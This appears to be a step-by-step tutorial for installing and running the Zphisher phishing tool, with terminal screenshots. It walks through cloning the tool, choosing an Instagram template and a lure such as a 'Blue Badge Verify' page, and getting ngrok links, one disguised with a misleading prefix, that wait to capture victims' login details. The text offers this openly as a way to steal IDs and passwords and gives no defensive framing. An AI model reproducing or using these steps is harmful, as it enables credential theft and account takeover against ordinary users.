

OVERVIEW

Zphisher is a powerful open-source tool Phishing Tool. Zphisher is easier than Social Engineering Toolkit. It contains some templates generated by a tool called Zphisher and offers phishing templates webpages for 18 popular sites **such as Facebook**, **Instagram**, **Google**, **Snapchat**, **GitHub**, **Yahoo**, **Proton mail**, **Spotify**, **Netflix**, **LinkedIn**, **WordPress**, **Origin**, **Steam**, **Microsoft**, **etc**. It also provides an option to use a custom template if someone wants. This tool makes it easy to perform a phishing attack. Using this tool you can perform phishing in (a wide area network). This tool can be used to get credentials such as **IDs**, **and passwords**.



Installation:

Step 1: To install the tool first move to the desktop and then install the tool using the following commands.

git clone git://github.com/htr-tech/zphisher.git cd zphisher

```
File Actions Edit View Help

root@kali:~/Desktop
root@kali:~/Desktop# git clone git://github.com/htr-tech/zphisher
.git
Cloning into 'zphisher'...
remote: Enumerating objects: 1303, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 1303 (delta 6), reused 17 (delta 4), pack-reused 12
80
Receiving objects: 100% (1303/1303), 25.09 MiB | 3.38 MiB/s, done
.
Resolving deltas: 100% (569/569), done.
root@kali:~/Desktop# cd zphisher
root@kali:~/Desktop/zphisher#
```

Step 2: Now you are in the zphisher directory use the following command to run the tool.

bash zphisher.sh

```
root@kali: ~/Desktop/zphisher

File Actions Edit View Help

remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 1303 (delta 6), reused 17 (delta 4), pack-reused 12
80
Receiving objects: 100% (1303/1303), 25.09 MiB | 3.38 MiB/s, done
.
Resolving deltas: 100% (569/569), done.
root@kali: ~/Desktop# cd zphisher
root@kali: ~/Desktop/zphisher# bash zphisher.sh

[+] Installing required packages ...

[+] Packages already installed.

[+] Installing ngrok ...
```

Step 3: The tool has started running successfully. Now you have to choose the options from the tool for which you have to make the phishing page.



Step 4: From these options, you can choose the option for which you have to create a phishing page. Suppose you want to create a phishing page for Instagram then choose option 2.

```
root@kali: ~/Desktop/zphisher
File
     Actions
              Edit View Help
                        Protonmail
                                          Yandex
07
    Steam
                   17
                                      27
08
    Twitter
                   18
                        Spotify
                                      28
                                          StackoverFlow
    Playstation
09
                   19
                        Reddit
                                      29
                                          ٧k
    Tiktok
                    20
                        Adobe
                                      30
                                          XBOX
10
                                      [33] Github
[31] Mediafire
                   [32] Gitlab
99 About
                   [00] Exit
[-] Select an option : 2
01] Traditional Login Page
[02] Auto Followers Login Page
[03] 1000 Followers Login Page
04] Blue Badge Verify Login Page
[-] Select an option :
```

Step 5: Now you can see that to attract the victim it's giving 4 options. You can choose any option from here. Suppose you want to choose the first option then type 1.

```
root@kali: ~/Desktop/zphisher

File Actions Edit View Help

2.1

[-] URL 1: https://dbc58bf4c5c5.ngrok.io

[-] URL 2: http://get-unlimited-followers-for-instagram@dbc58bf4c5c5.ngrok.io

[-] Waiting for Login Info, Ctrl + C to exit...
```